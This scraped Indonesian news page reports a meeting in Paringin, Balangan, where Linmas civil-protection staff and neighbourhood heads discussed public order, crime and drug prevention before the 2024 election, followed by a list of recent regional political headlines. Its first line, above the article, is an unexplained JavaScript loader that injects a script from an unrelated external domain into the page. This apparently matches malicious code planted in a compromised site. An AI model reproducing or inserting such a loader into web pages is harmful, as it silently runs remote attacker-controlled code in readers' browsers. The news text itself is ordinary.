(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Linmas dan RT se Kecamatan Paringin Dikumpulkan Bahas Ketertiban Umum


KANALKALIMANTAN.COM, PARINGIN – Memperkuat sinergitas menjaga ketentraman dan ketertiban umum, serta perlindungan masyarakat, Pemerintah Kecamatan Paringin menggelar rapat yang dihadiri Linmas dan RT se Kecamatan Paringin, Rabu (29/11/2023)

Camat Paringin, Renny Yudisthesia mengatakan, pentingnya kerjasama antara Linmas dan RT dalam menjaga keamanan dan ketertiban di wilayah kecamatan.

Camat Paringin meminta untuk mengaktifkan Poskamling yang ada di tingkat kelurahan maupun desa menjaga ketentraman dan ketertiban menjelang Pemilu 2024.

“Sinergi antara Linmas dan RT sangat penting untuk menciptakan lingkungan yang aman dan nyaman bagi masyarakat,” ujarnya.

Renny Yudisthesia menambahkan bahwa rapat koordinasi ini merupakan langkah konkret dalam meningkatkan peran serta masyarakat dalam menjaga keamanan dan ketertiban.

“Berbagai strategi dan langkah-langkah yang dapat dilakukan oleh Linmas dan RT untuk mengatasi berbagai permasalahan yang mungkin timbul di masyarakat,” harapnya.

Selain itu, dalam rapat koordinasi ini juga diadakan diskusi terkait upaya pencegahan dan penanggulangan tindak kriminalitas, penyalahgunaan narkoba, serta penanganan konflik sosial.

Bertujuan untuk memberikan pemahaman dan pengetahuan kepada Linmas dan RT dalam menghadapi situasi yang mungkin terjadi di masyarakat.

Rapat koordinasi dapat menghasilkan kesepakatan bersama antara Linmas dan RT dalam menjaga ketentraman dan ketertiban umum.

“Linmas dan RT melaksanakan tugas dan tanggung jawab lebih efektif dan efisien. Masyarakat pun diharapkan dapat merasakan manfaat dari upaya bersama dalam menjaga ketentraman dan ketertiban umum di wilayah masing-masing,” pungkasnya.(Kanalkalimantan.com/mcbalangan/adv)

Editor: kk


Muhammad Andi

Recent Posts

5 Nama Pendaftar Bacalon Pilwali Banjarbaru ke PDIP

KANALKALIMANTAN.COM, BANJARBARU - Lima buah formulir pendaftaran diambil oleh lima orang bakal calon Pilkada 2024… Read More

2 jam ago

Acil Odah Resmi Lamar Golkar Maju Pilgub Kalsel 2024

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hj Raudatul Jannah alias Acil Odah untuk maju pada kontestasi Pemilihan… Read More

3 jam ago

Golkar Banjarbaru Buka Penjaringan Bakal Calon Wali Kota

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Golkar Kota Banjarbaru membuka pendaftaran bakal calon Wali Kota dan… Read More

3 jam ago

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

6 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

8 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

18 jam ago

This website uses cookies.